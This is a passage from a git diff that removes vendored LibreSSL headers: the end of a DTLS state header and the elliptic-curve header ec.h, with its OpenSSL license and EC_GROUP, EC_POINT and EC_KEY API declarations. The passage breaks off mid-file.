-	/* Indicates when the last handshake msg or heartbeat sent will timeout */
-	struct timeval next_timeout;
-
-	/* Timeout duration */
-	unsigned short timeout_duration;
-
-	struct dtls1_state_internal_st *internal;
-} DTLS1_STATE;
-
-typedef struct dtls1_record_data_st {
-	unsigned char *packet;
-	unsigned int   packet_length;
-	SSL3_BUFFER    rbuf;
-	SSL3_RECORD    rrec;
-} DTLS1_RECORD_DATA;
-
-#endif
-
-/* Timeout multipliers (timeout slice is defined in apps/timeouts.h */
-#define DTLS1_TMO_READ_COUNT                      2
-#define DTLS1_TMO_WRITE_COUNT                     2
-
-#define DTLS1_TMO_ALERT_COUNT                     12
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ec.h b/thirdparty/libressl/include/openssl/ec.h
deleted file mode 100644
index dc70cfa..0000000
--- a/thirdparty/libressl/include/openssl/ec.h
+++ /dev/null
@@ -1,1169 +0,0 @@
-/* $OpenBSD: ec.h,v 1.12 2016/11/04 17:33:19 miod Exp $ */
-/*
- * Originally written by Bodo Moeller for the OpenSSL project.
- */
-/**
- * \file crypto/ec/ec.h Include file for the OpenSSL EC functions
- * \author Originally written by Bodo Moeller for the OpenSSL project
- */
-/* ====================================================================
- * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by 
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the OpenSSL open source
- * license provided above.
- *
- * The elliptic curve binary polynomial software is originally written by 
- * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
- *
- */
-
-#ifndef HEADER_EC_H
-#define HEADER_EC_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_EC
-#error EC is disabled.
-#endif
-
-#include <openssl/asn1.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#elif defined(__SUNPRO_C)
-# if __SUNPRO_C >= 0x520
-# pragma error_messages (off,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
-# endif
-#endif
-
-  
-#ifndef OPENSSL_ECC_MAX_FIELD_BITS
-# define OPENSSL_ECC_MAX_FIELD_BITS 661
-#endif
-
-/** Enum for the point conversion form as defined in X9.62 (ECDSA)
- *  for the encoding of a elliptic curve point (x,y) */
-typedef enum {
-	/** the point is encoded as z||x, where the octet z specifies 
-	 *  which solution of the quadratic equation y is  */
-	POINT_CONVERSION_COMPRESSED = 2,
-	/** the point is encoded as z||x||y, where z is the octet 0x02  */
-	POINT_CONVERSION_UNCOMPRESSED = 4,
-	/** the point is encoded as z||x||y, where the octet z specifies
-         *  which solution of the quadratic equation y is  */
-	POINT_CONVERSION_HYBRID = 6
-} point_conversion_form_t;
-
-
-typedef struct ec_method_st EC_METHOD;
-
-typedef struct ec_group_st
-	/*
-	 EC_METHOD *meth;
-	 -- field definition
-	 -- curve coefficients
-	 -- optional generator with associated information (order, cofactor)
-	 -- optional extra data (precomputed table for fast computation of multiples of generator)
-	 -- ASN1 stuff
-	*/
-	EC_GROUP;
-
-typedef struct ec_point_st EC_POINT;
-
-
-/********************************************************************/
-/*               EC_METHODs for curves over GF(p)                   */       
-/********************************************************************/
-
-/** Returns the basic GFp ec methods which provides the basis for the
- *  optimized methods. 
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_simple_method(void);
-
-/** Returns GFp methods using montgomery multiplication.
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_mont_method(void);
-
-/** Returns GFp methods using optimized methods for NIST recommended curves
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nist_method(void);
-
-#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
-/** Returns 64-bit optimized methods for nistp224
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp224_method(void);
-
-/** Returns 64-bit optimized methods for nistp256
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp256_method(void);
-
-/** Returns 64-bit optimized methods for nistp521
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GFp_nistp521_method(void);
-#endif
-
-#ifndef OPENSSL_NO_EC2M
-/********************************************************************/ 
-/*           EC_METHOD for curves over GF(2^m)                      */
-/********************************************************************/
-
-/** Returns the basic GF2m ec method 
- *  \return  EC_METHOD object
- */
-const EC_METHOD *EC_GF2m_simple_method(void);
-
-#endif
-
-
-/********************************************************************/
-/*                   EC_GROUP functions                             */
-/********************************************************************/
-
-/** Creates a new EC_GROUP object
- *  \param   meth  EC_METHOD to use
- *  \return  newly created EC_GROUP object or NULL in case of an error.
- */
-EC_GROUP *EC_GROUP_new(const EC_METHOD *meth);
-
-/** Frees a EC_GROUP object
- *  \param  group  EC_GROUP object to be freed.
- */
-void EC_GROUP_free(EC_GROUP *group);
-
-/** Clears and frees a EC_GROUP object
- *  \param  group  EC_GROUP object to be cleared and freed.
- */
-void EC_GROUP_clear_free(EC_GROUP *group);
-
-/** Copies EC_GROUP objects. Note: both EC_GROUPs must use the same EC_METHOD.
- *  \param  dst  destination EC_GROUP object
- *  \param  src  source EC_GROUP object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_GROUP_copy(EC_GROUP *dst, const EC_GROUP *src);
-
-/** Creates a new EC_GROUP object and copies the copies the content
- *  form src to the newly created EC_KEY object
- *  \param  src  source EC_GROUP object
- *  \return newly created EC_GROUP object or NULL in case of an error.
- */
-EC_GROUP *EC_GROUP_dup(const EC_GROUP *src);
-
-/** Returns the EC_METHOD of the EC_GROUP object.
- *  \param  group  EC_GROUP object 
- *  \return EC_METHOD used in this EC_GROUP object.
- */
-const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group);
-
-/** Returns the field type of the EC_METHOD.
- *  \param  meth  EC_METHOD object
- *  \return NID of the underlying field type OID.
- */
-int EC_METHOD_get_field_type(const EC_METHOD *meth);
-
-/** Sets the generator and it's order/cofactor of a EC_GROUP object.
- *  \param  group      EC_GROUP object 
- *  \param  generator  EC_POINT object with the generator.
- *  \param  order      the order of the group generated by the generator.
- *  \param  cofactor   the index of the sub-group generated by the generator
- *                     in the group of all points on the elliptic curve.
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator, const BIGNUM *order, const BIGNUM *cofactor);
-
-/** Returns the generator of a EC_GROUP object.
- *  \param  group  EC_GROUP object
- *  \return the currently used generator (possibly NULL).
- */
-const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group);
-
-/** Gets the order of a EC_GROUP
- *  \param  group  EC_GROUP object
- *  \param  order  BIGNUM to which the order is copied
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx);
-
-/** Gets the cofactor of a EC_GROUP
- *  \param  group     EC_GROUP object
- *  \param  cofactor  BIGNUM to which the cofactor is copied
- *  \param  ctx       BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor, BN_CTX *ctx);
-
-/** Sets the name of a EC_GROUP object
- *  \param  group  EC_GROUP object
- *  \param  nid    NID of the curve name OID
- */
-void EC_GROUP_set_curve_name(EC_GROUP *group, int nid);
-
-/** Returns the curve name of a EC_GROUP object
- *  \param  group  EC_GROUP object
- *  \return NID of the curve name OID or 0 if not set.
- */
-int EC_GROUP_get_curve_name(const EC_GROUP *group);
-
-void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag);
-int EC_GROUP_get_asn1_flag(const EC_GROUP *group);
-
-void EC_GROUP_set_point_conversion_form(EC_GROUP *group, point_conversion_form_t form);
-point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP *);
-
-unsigned char *EC_GROUP_get0_seed(const EC_GROUP *x);
-size_t EC_GROUP_get_seed_len(const EC_GROUP *);
-size_t EC_GROUP_set_seed(EC_GROUP *, const unsigned char *, size_t len);
-
-/** Sets the parameter of a ec over GFp defined by y^2 = x^3 + a*x + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM with the prime number
- *  \param  a      BIGNUM with parameter a of the equation
- *  \param  b      BIGNUM with parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-
-/** Gets the parameter of the ec over GFp defined by y^2 = x^3 + a*x + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM for the prime number
- *  \param  a      BIGNUM for parameter a of the equation
- *  \param  b      BIGNUM for parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
-
-#ifndef OPENSSL_NO_EC2M
-/** Sets the parameter of a ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM with the polynomial defining the underlying field
- *  \param  a      BIGNUM with parameter a of the equation
- *  \param  b      BIGNUM with parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-
-/** Gets the parameter of the ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
- *  \param  group  EC_GROUP object
- *  \param  p      BIGNUM for the polynomial defining the underlying field
- *  \param  a      BIGNUM for parameter a of the equation
- *  \param  b      BIGNUM for parameter b of the equation
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
-#endif
-/** Returns the number of bits needed to represent a field element 
- *  \param  group  EC_GROUP object
- *  \return number of bits needed to represent a field element
- */
-int EC_GROUP_get_degree(const EC_GROUP *group);
-
-/** Checks whether the parameter in the EC_GROUP define a valid ec group
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if group is a valid ec group and 0 otherwise
- */
-int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx);
-
-/** Checks whether the discriminant of the elliptic curve is zero or not
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if the discriminant is not zero and 0 otherwise
- */
-int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx);
-
-/** Compares two EC_GROUP objects
- *  \param  a    first EC_GROUP object
- *  \param  b    second EC_GROUP object
- *  \param  ctx  BN_CTX object (optional)
- *  \return 0 if both groups are equal and 1 otherwise
- */
-int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx);
-
-/* EC_GROUP_new_GF*() calls EC_GROUP_new() and EC_GROUP_set_GF*()
- * after choosing an appropriate EC_METHOD */
-
-/** Creates a new EC_GROUP object with the specified parameters defined
- *  over GFp (defined by the equation y^2 = x^3 + a*x + b)
- *  \param  p    BIGNUM with the prime number
- *  \param  a    BIGNUM with the parameter a of the equation
- *  \param  b    BIGNUM with the parameter b of the equation
- *  \param  ctx  BN_CTX object (optional)
- *  \return newly created EC_GROUP object with the specified parameters
- */
-EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#ifndef OPENSSL_NO_EC2M
-/** Creates a new EC_GROUP object with the specified parameters defined
- *  over GF2m (defined by the equation y^2 + x*y = x^3 + a*x^2 + b)
- *  \param  p    BIGNUM with the polynomial defining the underlying field
- *  \param  a    BIGNUM with the parameter a of the equation
- *  \param  b    BIGNUM with the parameter b of the equation
- *  \param  ctx  BN_CTX object (optional)
- *  \return newly created EC_GROUP object with the specified parameters
- */
-EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#endif
-/** Creates a EC_GROUP object with a curve specified by a NID
- *  \param  nid  NID of the OID of the curve name
- *  \return newly created EC_GROUP object with specified curve or NULL
- *          if an error occurred
- */
-EC_GROUP *EC_GROUP_new_by_curve_name(int nid);
-
-
-/********************************************************************/
-/*               handling of internal curves                        */
-/********************************************************************/
-
-typedef struct { 
-	int nid;
-	const char *comment;
-	} EC_builtin_curve;
-
-/* EC_builtin_curves(EC_builtin_curve *r, size_t size) returns number 
- * of all available curves or zero if a error occurred. 
- * In case r ist not zero nitems EC_builtin_curve structures 
- * are filled with the data of the first nitems internal groups */
-size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems);
-
-const char *EC_curve_nid2nist(int nid);
-int EC_curve_nist2nid(const char *name);
-
-/********************************************************************/
-/*                    EC_POINT functions                            */
-/********************************************************************/
-
-/** Creates a new EC_POINT object for the specified EC_GROUP
- *  \param  group  EC_GROUP the underlying EC_GROUP object
- *  \return newly created EC_POINT object or NULL if an error occurred
- */
-EC_POINT *EC_POINT_new(const EC_GROUP *group);
-
-/** Frees a EC_POINT object
- *  \param  point  EC_POINT object to be freed
- */
-void EC_POINT_free(EC_POINT *point);
-
-/** Clears and frees a EC_POINT object
- *  \param  point  EC_POINT object to be cleared and freed
- */
-void EC_POINT_clear_free(EC_POINT *point);
-
-/** Copies EC_POINT object
- *  \param  dst  destination EC_POINT object
- *  \param  src  source EC_POINT object
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_copy(EC_POINT *dst, const EC_POINT *src);
-
-/** Creates a new EC_POINT object and copies the content of the supplied
- *  EC_POINT
- *  \param  src    source EC_POINT object
- *  \param  group  underlying the EC_GROUP object
- *  \return newly created EC_POINT object or NULL if an error occurred 
- */
-EC_POINT *EC_POINT_dup(const EC_POINT *src, const EC_GROUP *group);
- 
-/** Returns the EC_METHOD used in EC_POINT object 
- *  \param  point  EC_POINT object
- *  \return the EC_METHOD used
- */
-const EC_METHOD *EC_POINT_method_of(const EC_POINT *point);
-
-/** Sets a point to infinity (neutral element)
- *  \param  group  underlying EC_GROUP object
- *  \param  point  EC_POINT to set to infinity
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point);
-
-/** Sets the jacobian projective coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  z      BIGNUM with the z-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, const BIGNUM *z, BN_CTX *ctx);
-
-/** Gets the jacobian projective coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  z      BIGNUM for the z-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BIGNUM *z, BN_CTX *ctx);
-
-/** Sets the affine coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
-
-/** Gets the affine coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
-
-/** Sets the x9.62 compressed coordinates of a EC_POINT over GFp
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with x-coordinate
- *  \param  y_bit  integer with the y-Bit (either 0 or 1)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, int y_bit, BN_CTX *ctx);
-#ifndef OPENSSL_NO_EC2M
-/** Sets the affine coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with the x-coordinate
- *  \param  y      BIGNUM with the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
-
-/** Gets the affine coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM for the x-coordinate
- *  \param  y      BIGNUM for the y-coordinate
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
-	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
-
-/** Sets the x9.62 compressed coordinates of a EC_POINT over GF2m
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  x      BIGNUM with x-coordinate
- *  \param  y_bit  integer with the y-Bit (either 0 or 1)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
-	const BIGNUM *x, int y_bit, BN_CTX *ctx);
-#endif
-/** Encodes a EC_POINT object to a octet string
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  form   point conversion form
- *  \param  buf    memory buffer for the result. If NULL the function returns
- *                 required buffer size.
- *  \param  len    length of the memory buffer
- *  \param  ctx    BN_CTX object (optional)
- *  \return the length of the encoded octet string or 0 if an error occurred
- */
-size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *p,
-	point_conversion_form_t form,
-        unsigned char *buf, size_t len, BN_CTX *ctx);
-
-/** Decodes a EC_POINT from a octet string
- *  \param  group  underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \param  buf    memory buffer with the encoded ec point
- *  \param  len    length of the encoded ec point
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *p,
-        const unsigned char *buf, size_t len, BN_CTX *ctx);
-
-/* other interfaces to point2oct/oct2point: */
-BIGNUM *EC_POINT_point2bn(const EC_GROUP *, const EC_POINT *,
-	point_conversion_form_t form, BIGNUM *, BN_CTX *);
-EC_POINT *EC_POINT_bn2point(const EC_GROUP *, const BIGNUM *,
-	EC_POINT *, BN_CTX *);
-char *EC_POINT_point2hex(const EC_GROUP *, const EC_POINT *,
-	point_conversion_form_t form, BN_CTX *);
-EC_POINT *EC_POINT_hex2point(const EC_GROUP *, const char *,
-	EC_POINT *, BN_CTX *);
-
-
-/********************************************************************/
-/*         functions for doing EC_POINT arithmetic                  */
-/********************************************************************/
-
-/** Computes the sum of two EC_POINT 
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result (r = a + b)
- *  \param  a      EC_POINT object with the first summand
- *  \param  b      EC_POINT object with the second summand
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
-
-/** Computes the double of a EC_POINT
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result (r = 2 * a)
- *  \param  a      EC_POINT object 
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, BN_CTX *ctx);
-
-/** Computes the inverse of a EC_POINT
- *  \param  group  underlying EC_GROUP object
- *  \param  a      EC_POINT object to be inverted (it's used for the result as well)
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx);
-
-/** Checks whether the point is the neutral element of the group
- *  \param  group  the underlying EC_GROUP object
- *  \param  p      EC_POINT object
- *  \return 1 if the point is the neutral element and 0 otherwise
- */
-int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *p);
-
-/** Checks whether the point is on the curve 
- *  \param  group  underlying EC_GROUP object
- *  \param  point  EC_POINT object to check
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 if point if on the curve and 0 otherwise
- */
-int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point, BN_CTX *ctx);
-
-/** Compares two EC_POINTs 
- *  \param  group  underlying EC_GROUP object
- *  \param  a      first EC_POINT object
- *  \param  b      second EC_POINT object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 0 if both points are equal and a value != 0 otherwise
- */
-int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
-
-int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx);
-int EC_POINTs_make_affine(const EC_GROUP *group, size_t num, EC_POINT *points[], BN_CTX *ctx);
-
-/** Computes r = generator * n sum_{i=0}^num p[i] * m[i]
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result
- *  \param  n      BIGNUM with the multiplier for the group generator (optional)
- *  \param  num    number futher summands
- *  \param  p      array of size num of EC_POINT objects
- *  \param  m      array of size num of BIGNUM objects
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, size_t num, const EC_POINT *p[], const BIGNUM *m[], BN_CTX *ctx);
-
-/** Computes r = generator * n + q * m
- *  \param  group  underlying EC_GROUP object
- *  \param  r      EC_POINT object for the result
- *  \param  n      BIGNUM with the multiplier for the group generator (optional)
- *  \param  q      EC_POINT object with the first factor of the second summand
- *  \param  m      BIGNUM with the second factor of the second summand
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, const EC_POINT *q, const BIGNUM *m, BN_CTX *ctx);
-
-/** Stores multiples of generator for faster point multiplication
- *  \param  group  EC_GROUP object
- *  \param  ctx    BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occured
- */
-int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
-
-/** Reports whether a precomputation has been done
- *  \param  group  EC_GROUP object
- *  \return 1 if a pre-computation has been done and 0 otherwise
- */
-int EC_GROUP_have_precompute_mult(const EC_GROUP *group);
-
-
-/********************************************************************/
-/*                       ASN1 stuff                                 */
-/********************************************************************/
-
-/* EC_GROUP_get_basis_type() returns the NID of the basis type
- * used to represent the field elements */
-int EC_GROUP_get_basis_type(const EC_GROUP *);
-#ifndef OPENSSL_NO_EC2M
-int EC_GROUP_get_trinomial_basis(const EC_GROUP *, unsigned int *k);
-int EC_GROUP_get_pentanomial_basis(const EC_GROUP *, unsigned int *k1, 
-	unsigned int *k2, unsigned int *k3);
-#endif
-
-#define OPENSSL_EC_NAMED_CURVE	0x001
-
-typedef struct ecpk_parameters_st ECPKPARAMETERS;
-
-EC_GROUP *d2i_ECPKParameters(EC_GROUP **, const unsigned char **in, long len);
-int i2d_ECPKParameters(const EC_GROUP *, unsigned char **out);
-
-#define d2i_ECPKParameters_bio(bp,x) ASN1_d2i_bio_of(EC_GROUP,NULL,d2i_ECPKParameters,bp,x)
-#define i2d_ECPKParameters_bio(bp,x) ASN1_i2d_bio_of_const(EC_GROUP,i2d_ECPKParameters,bp,x)
-#define d2i_ECPKParameters_fp(fp,x) (EC_GROUP *)ASN1_d2i_fp(NULL, \
-                (char *(*)())d2i_ECPKParameters,(fp),(unsigned char **)(x))
-#define i2d_ECPKParameters_fp(fp,x) ASN1_i2d_fp(i2d_ECPKParameters,(fp), \
-		(unsigned char *)(x))
-
-#ifndef OPENSSL_NO_BIO
-int     ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off);
-#endif
-int     ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off);
-
-
-/********************************************************************/
-/*                      EC_KEY functions                            */
-/********************************************************************/
-
-typedef struct ec_key_st EC_KEY;
-
-/* some values for the encoding_flag */
-#define EC_PKEY_NO_PARAMETERS	0x001
-#define EC_PKEY_NO_PUBKEY	0x002
-
-/* some values for the flags field */
-#define EC_FLAG_NON_FIPS_ALLOW	0x1
-#define EC_FLAG_FIPS_CHECKED	0x2
-
-/** Creates a new EC_KEY object.
- *  \return EC_KEY object or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_new(void);
-
-int EC_KEY_get_flags(const EC_KEY *key);
-
-void EC_KEY_set_flags(EC_KEY *key, int flags);
-
-void EC_KEY_clear_flags(EC_KEY *key, int flags);
-
-/** Creates a new EC_KEY object using a named curve as underlying
- *  EC_GROUP object.
- *  \param  nid  NID of the named curve.
- *  \return EC_KEY object or NULL if an error occurred. 
- */
-EC_KEY *EC_KEY_new_by_curve_name(int nid);
-
-/** Frees a EC_KEY object.
- *  \param  key  EC_KEY object to be freed.
- */
-void EC_KEY_free(EC_KEY *key);
-
-/** Copies a EC_KEY object.
- *  \param  dst  destination EC_KEY object
- *  \param  src  src EC_KEY object
- *  \return dst or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
-
-/** Creates a new EC_KEY object and copies the content from src to it.
- *  \param  src  the source EC_KEY object
- *  \return newly created EC_KEY object or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_dup(const EC_KEY *src);
-
-/** Increases the internal reference count of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_up_ref(EC_KEY *key);
-
-/** Returns the EC_GROUP object of a EC_KEY object
- *  \param  key  EC_KEY object
- *  \return the EC_GROUP object (possibly NULL).
- */
-const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
-
-/** Sets the EC_GROUP of a EC_KEY object.
- *  \param  key    EC_KEY object
